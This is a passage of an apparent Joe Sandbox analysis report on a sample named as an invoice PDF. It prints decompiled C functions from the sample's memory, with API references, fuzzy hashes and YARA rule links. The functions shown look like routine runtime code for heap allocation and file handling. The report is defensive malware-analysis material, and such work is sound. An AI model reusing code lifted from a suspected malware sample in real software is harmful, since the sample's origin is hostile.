                            • Instruction Fuzzy Hash: CF212632E04B42A7D3249B3CCC016A6F3A0FFA8218F849B19FE9862545FB21F5D4C381
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01319FC9, Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E01319FC9(signed int __edx, intOrPtr* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t64;
				signed int _t66;
				signed char _t68;
				signed int _t70;
				signed char _t77;
				intOrPtr* _t78;
				signed int _t79;
				signed char _t80;
				intOrPtr _t82;
				intOrPtr _t83;
				signed int _t90;
				intOrPtr _t93;
				signed int _t94;
				intOrPtr* _t95;
				signed char _t96;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t118;
				signed int _t120;

				_t104 = __edx;
				if(_a4 != 0) {
					_t64 = E013209C5(_a4);
					_t93 = _a4;
					_t118 = _t64;
					__eflags =  *(_t93 + 8);
					if( *(_t93 + 8) < 0) {
						 *(_t93 + 8) = 0;
					}
					_t66 = E013227EC(_t118, 0, 0, 1); // executed
					_t90 = _t104;
					_t109 = _t66;
					_v12 = _t109;
					__eflags = _t90;
					if(__eflags > 0) {
						L7:
						_t68 =  *(_a4 + 0xc);
						__eflags = _t68 & 0x000000c0;
						if((_t68 & 0x000000c0) != 0) {
							_t70 = _t118 >> 6;
							_t94 = (_t118 & 0x0000003f) * 0x30;
							_v16 = _t70;
							_v20 = _t94;
							_t95 = _a4;
							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0x1346108 + _t70 * 4)) + 0x29));
							_t96 =  *(_t95 + 0xc);
							asm("cdq");
							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
							__eflags = _t96 & 0x00000003;
							if((_t96 & 0x00000003) == 0) {
								_t77 =  *(_a4 + 0xc) >> 2;
								__eflags = _t77 & 0x00000001;
								if((_t77 & 0x00000001) != 0) {
									L23:
									_t78 = _a4;
									L24:
									__eflags = _t109 | _t90;
									if((_t109 | _t90) == 0) {
										L30:
										_t79 = _t120;
										goto L31;
									}
									_t80 =  *(_t78 + 0xc);
									__eflags = _t80 & 0x00000001;
									if((_t80 & 0x00000001) == 0) {
										__eflags = _v5 - 1;
										if(_v5 == 1) {
											_t120 = E01317AE0(_t120, _t104, 2, 0);
										}
										_t120 = _t120 + _t109;
										asm("adc edx, ebx");
										goto L30;
									}
									_t79 = E0131A15E(_a4, _t109, _t90, _t120, _t104);
									goto L31;
								}
								_t66 = E0131C9CE();
								 *_t66 = 0x16;
								goto L22;
							}
							__eflags = _v5 - 1;
							_t99 = _v16;
							if(_v5 != 1) {
								L13:
								_t82 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
								_t100 = _v20;
								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
									goto L23;
								}
								_t78 = _a4;
								_v20 = _v20 & 0x00000000;
								_t111 =  *(_t78 + 4);
								__eflags =  *_t78 - _t111;
								asm("sbb edi, edi");
								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
								__eflags = _t113;
								_v16 = _t113;
								_t109 = _v12;
								if(_t113 == 0) {
									goto L24;
								}
								_t103 =  *(_t78 + 4);
								_t114 = _v20;
								do {
									__eflags =  *_t103 - 0xa;
									if( *_t103 == 0xa) {
										_t120 = _t120 + 1;
										asm("adc edx, 0x0");
									}
									_t103 = _t103 + 1;
									_t114 = _t114 + 1;
									__eflags = _t114 - _v16;
								} while (_t114 != _v16);
								_t109 = _v12;
								goto L24;
							}
							_t115 = _v20;
							_t83 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
							_t109 = _v12;
							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t79 = E0131A2E2(_a4, _t109, _t90);
							goto L31;
						}
						asm("cdq");
						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ebx, edx");
						goto L31;
					} else {
						if(__eflags < 0) {
							L22:
							_t79 = _t66 | 0xffffffff;
							L31:
							return _t79;
						}
						__eflags = _t109;
						if(_t109 < 0) {
							goto L22;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E0131C9CE())) = 0x16;
				return E01321788() | 0xffffffff;
			}
































                            0x01319fc9
                            0x01319fd5
                            0x01319ff5
                            0x01319ffb
                            0x01319ffe
                            0x0131a002
                            0x0131a005
                            0x0131a007
                            0x0131a007
                            0x0131a011
                            0x0131a016
                            0x0131a01b
                            0x0131a01d
                            0x0131a020
                            0x0131a022
                            0x0131a032
                            0x0131a035
                            0x0131a038
                            0x0131a03a
                            0x0131a055
                            0x0131a058
                            0x0131a05b
                            0x0131a065
                            0x0131a06c
                            0x0131a06f
                            0x0131a077
                            0x0131a07a
                            0x0131a07b
                            0x0131a07d
                            0x0131a080
                            0x0131a104
                            0x0131a107
                            0x0131a109
                            0x0131a11d
                            0x0131a11d
                            0x0131a120
                            0x0131a122
                            0x0131a124
                            0x0131a155
                            0x0131a155
                            0x00000000
                            0x0131a155
                            0x0131a126
                            0x0131a129
                            0x0131a12b
                            0x0131a13e
                            0x0131a142
                            0x0131a14f
                            0x0131a14f
                            0x0131a151
                            0x0131a153
                            0x00000000
                            0x0131a153
                            0x0131a134
                            0x00000000
                            0x0131a139
                            0x0131a10b
                            0x0131a110
                            0x00000000
                            0x0131a110
                            0x0131a082
                            0x0131a086
                            0x0131a089
                            0x0131a0b1
                            0x0131a0b1
                            0x0131a0b8
                            0x0131a0bb
                            0x0131a0c0
                            0x00000000
                            0x00000000
                            0x0131a0c2
                            0x0131a0c5
                            0x0131a0ce
                            0x0131a0d1
                            0x0131a0d3
                            0x0131a0d7
                            0x0131a0d7
                            0x0131a0d9
                            0x0131a0dc
                            0x0131a0df
                            0x00000000
                            0x00000000
                            0x0131a0e1
                            0x0131a0e4
                            0x0131a0e7
                            0x0131a0e7
                            0x0131a0ea
                            0x0131a0ec
                            0x0131a0ef
                            0x0131a0ef
                            0x0131a0f2
                            0x0131a0f3
                            0x0131a0f4
                            0x0131a0f4
                            0x0131a0f9
                            0x00000000
                            0x0131a0f9
                            0x0131a08b
                            0x0131a08e
                            0x0131a095
                            0x0131a09a
                            0x0131a09d
                            0x00000000
                            0x00000000
                            0x0131a0a4
                            0x00000000
                            0x0131a0a9
                            0x0131a042
                            0x0131a045
                            0x0131a047
                            0x00000000
                            0x0131a024
                            0x0131a024
                            0x0131a116
                            0x0131a116
                            0x0131a157
                            0x00000000
                            0x0131a159
                            0x0131a02a
                            0x0131a02c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131a02c
                            0x0131a022
                            0x01319fdc
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d838d643febb89b03841e44df8c39f16b9e227640df57acd32282dbe1a41e9df
                            • Instruction ID: 19d753185263835852b7fc9df9abc2640a1bb960ff59ec1e98b16808e132f909
                            • Opcode Fuzzy Hash: d838d643febb89b03841e44df8c39f16b9e227640df57acd32282dbe1a41e9df
                            • Instruction Fuzzy Hash: 05510B71A01248AFDB19DF2CCC40AA97BF5EF853A9F198168E8099B355C731ED42C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01325E01, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E01325E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t25;

				E01325BBD( &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 != 0) {
					_t25 = E0132C048( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t25 != 0) {
						goto L1;
					}
					 *0x1345e8c =  *0x1345e8c + 1;
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_a16 + 8)) = 0;
					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
					 *((intOrPtr*)(_a16 + 4)) = 0;
					 *_a16 = 0;
					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
					return _a16;
				}
				L1:
				return 0;
			}









                            0x01325e12
                            0x01325e1e
                            0x01325e1f
                            0x01325e20
                            0x01325e27
                            0x01325e3f
                            0x01325e49
                            0x00000000
                            0x00000000
                            0x01325e4e
                            0x01325e5a
                            0x01325e62
                            0x01325e68
                            0x01325e6e
                            0x01325e74
                            0x01325e7c
                            0x00000000
                            0x01325e7f
                            0x01325e29
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: d5024f25d73ea64be4faa1c076f9b9f3da70eb7fae0c75ad0b7c775018cf772a
                            • Instruction ID: 0dc0c3045d7827aa792239f99289e8a13b79d448bc255385b7e007941630f2f9
                            • Opcode Fuzzy Hash: d5024f25d73ea64be4faa1c076f9b9f3da70eb7fae0c75ad0b7c775018cf772a
                            • Instruction Fuzzy Hash: 8311187590410AAFCF15DF58E9409DF7BF8EF49314F008499F808EB311D671EA258BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131E562, Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E0131E562(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E01320B10(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E0132391E(_t28, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E013209EB(0);
				return _t31;
			}













                            0x0131e567
                            0x0131e568
                            0x0131e56f
                            0x0131e574
                            0x0131e578
                            0x0131e57c
                            0x0131e57f
                            0x0131e585
                            0x0131e585
                            0x0131e58b
                            0x0131e58d
                            0x0131e590
                            0x0131e590
                            0x0131e593
                            0x0131e595
                            0x0131e59b
                            0x0131e59f
                            0x0131e5a4
                            0x0131e5a8
                            0x0131e5aa
                            0x0131e5ad
                            0x0131e5b3
                            0x0131e5ba
                            0x0131e5be
                            0x0131e5c2
                            0x0131e5c5
                            0x0131e5c5
                            0x0131e5c9
                            0x0131e5cc
                            0x0131e581
                            0x0131e581
                            0x0131e581
                            0x0131e5ce
                            0x0131e5db

                            APIs
                              • Part of subcall function 01320B10: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            • _free.LIBCMT ref: 0131E5CE
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 96c3009d7deeecd5dc0a4f2725f353eb7d2c4963f0acba3011afd32d76aa04d2
                            • Instruction ID: 1260301cddfefd716b2fe5d24ca79de2d88777d5806f159145817eb7e8bfaeb1
                            • Opcode Fuzzy Hash: 96c3009d7deeecd5dc0a4f2725f353eb7d2c4963f0acba3011afd32d76aa04d2
                            • Instruction Fuzzy Hash: 3101F972200309ABE3369F69D841E5AFBEDFB89274F25052DE58593280FA71E905C774
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01319813, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E01319813(void* __ecx, intOrPtr _a4) {
				void* _t16;
				void* _t24;
				signed int _t25;
				signed int _t26;
				intOrPtr _t28;

				_t28 = _a4;
				if(_t28 == 0) {
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					return E01321788() | 0xffffffff;
				}
				_push(_t25);
				_t26 = _t25 | 0xffffffff;
				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t26 = E0131DA31(_t24, _t28);
					E01321AED(_t28);
					_t16 = E01321875(E013209C5(_t28)); // executed
					if(_t16 >= 0) {
						if( *(_t28 + 0x1c) != 0) {
							E013209EB( *(_t28 + 0x1c));
							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
						}
					} else {
						_t26 = _t26 | 0xffffffff;
					}
				}
				E013219EF(_t28);
				return _t26;
			}








                            0x01319819
                            0x0131981e
                            0x01319825
                            0x00000000
                            0x01319830
                            0x01319838
                            0x01319839
                            0x01319841
                            0x0131984a
                            0x0131984c
                            0x01319858
                            0x01319862
                            0x0131986d
                            0x01319872
                            0x01319877
                            0x0131987b
                            0x01319864
                            0x01319864
                            0x01319864
                            0x01319862
                            0x0131987d
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction ID: d09deeb620f9691d5acdb34e730c969156edfb58e51801daa8d62f24ce57ad41
                            • Opcode Fuzzy Hash: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction Fuzzy Hash: DDF0F432901634A7EA39366D9C04B5B3A988F9233CF000725ED25931D4DA70D80287E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320B10, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E01320B10(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x134655c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01320397();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0131C9CE())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E01328686(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                            0x01320b10
                            0x01320b16
                            0x01320b1b
                            0x01320b29
                            0x01320b29
                            0x01320b2f
                            0x01320b31
                            0x01320b31
                            0x01320b48
                            0x01320b51
                            0x01320b59
                            0x00000000
                            0x00000000
                            0x01320b39
                            0x01320b3b
                            0x01320b5d
                            0x01320b62
                            0x01320b68
                            0x00000000
                            0x01320b68
                            0x01320b3e
                            0x01320b43
                            0x01320b44
                            0x01320b46
                            0x00000000
                            0x00000000
                            0x01320b46
                            0x00000000
                            0x01320b48
                            0x01320b21
                            0x01320b27
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 47302dfb18cb09dba0589ace1cbd97a813322edf403d1c6ee795f274ad199083
                            • Instruction ID: 68a61ba8f32d1bf29f36f3f9dd856af59d524d176bf1f703f135285cdc8536a5
                            • Opcode Fuzzy Hash: 47302dfb18cb09dba0589ace1cbd97a813322edf403d1c6ee795f274ad199083
                            • Instruction Fuzzy Hash: 72F0B431501139A7EB393E6D9804F5A7F88AB427BCF144161FA0897184CA20D40886E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328DC7, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E01328DC7(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr* _t26;

				 *0x1345e8c =  *0x1345e8c + 1;
				_t26 = _a4;
				_t12 = E01320A25(__ecx, 0x1000); // executed
				 *((intOrPtr*)(_t26 + 4)) = _t12;
				E013209EB(0);
				if( *((intOrPtr*)(_t26 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t26 + 0x18)) = 2;
					 *((intOrPtr*)(_t26 + 4)) = _t26 + 0x14;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t26 + 0x18)) = 0x1000;
				}
				_t16 =  *((intOrPtr*)(_t26 + 4));
				 *(_t26 + 8) =  *(_t26 + 8) & 0x00000000;
				 *_t26 = _t16;
				return _t16;
			}






                            0x01328dcc
                            0x01328dd4
                            0x01328ddd
                            0x01328de4
                            0x01328de7
                            0x01328df5
                            0x01328e07
                            0x01328e0d
                            0x01328e14
                            0x01328df7
                            0x01328df7
                            0x01328dfa
                            0x01328dfd
                            0x01328dfd
                            0x01328e17
                            0x01328e1a
                            0x01328e1e
                            0x01328e23

                            APIs
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • _free.LIBCMT ref: 01328DE7
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Heap$AllocateErrorFreeLast_free
                            • String ID:
                            • API String ID: 314386986-0
                            • Opcode ID: 98f270e8ea80808b1f9e81bac9120a4326dbef03aac197e3923dd7d86866f0f8
                            • Instruction ID: 5f8a043a308e9c31cfcb5d94d8418bf533cafd92221ef6cfa35b1fdaaa5281e7
                            • Opcode Fuzzy Hash: 98f270e8ea80808b1f9e81bac9120a4326dbef03aac197e3923dd7d86866f0f8
                            • Instruction Fuzzy Hash: 0DF062710057048FE3349F15D841B52B7F8EB04719F10882EE69E97A91DBB4B844CBD4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320A25, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E01320A25(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0131C9CE())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x134655c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01320397();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E01328686(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                            0x01320a25
                            0x01320a2b
                            0x01320a31
                            0x01320a63
                            0x01320a68
                            0x01320a6e
                            0x00000000
                            0x01320a6e
                            0x01320a35
                            0x01320a37
                            0x01320a37
                            0x01320a4e
                            0x01320a57
                            0x01320a5f
                            0x00000000
                            0x00000000
                            0x01320a3f
                            0x01320a41
                            0x00000000
                            0x00000000
                            0x01320a44
                            0x01320a49
                            0x01320a4a
                            0x01320a4c
                            0x00000000
                            0x00000000
                            0x01320a4c
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: bd511986b4eb213473a5afba6e0b1f55363d4da687cbf702641693d21949972b
                            • Instruction ID: d0d491d4b1c5357a9d0e9361b3dd82ea35b01d9fc5ca14c5b65755a1c777e319
                            • Opcode Fuzzy Hash: bd511986b4eb213473a5afba6e0b1f55363d4da687cbf702641693d21949972b
                            • Instruction Fuzzy Hash: C0E0ED36101235A7FA397A7DAC44B5F7A9C9F423A8F950360FD5992084CA20C908C2E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314590, Relevance: 1.5, APIs: 1, Instructions: 20libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01314590(char* _a4) {
				struct HINSTANCE__* _t3;

				_t6 = E01314BF0(0, _a4, 0);
				_t3 = LoadLibraryExW(_t2, 0, 8); // executed
				L01319803(_t6);
				return _t3;
			}




                            0x013145a2
                            0x013145a9
                            0x013145b2
                            0x013145be

                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,01313540,?,?,?,?,00000000,0131263F,00000000,00000000), ref: 013145A9
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharLibraryLoadMultiWide
                            • String ID:
                            • API String ID: 2592636585-0
                            • Opcode ID: 0a818dc42502b5b334e135094be1d7b24d40ca11ec0670b01d43a2b70fb5341e
                            • Instruction ID: 692a96f333aa420022a00a78794f4d814ca8dce2f455900bb7bd02d4e2253a05
                            • Opcode Fuzzy Hash: 0a818dc42502b5b334e135094be1d7b24d40ca11ec0670b01d43a2b70fb5341e
                            • Instruction Fuzzy Hash: 2AD0A7B3B4031033E66021A93C06F5F69589BE1F56F090435F7089A1C4E550580943A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132BA5E, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0132BA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                            0x0132ba7b
                            0x0132ba82

                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
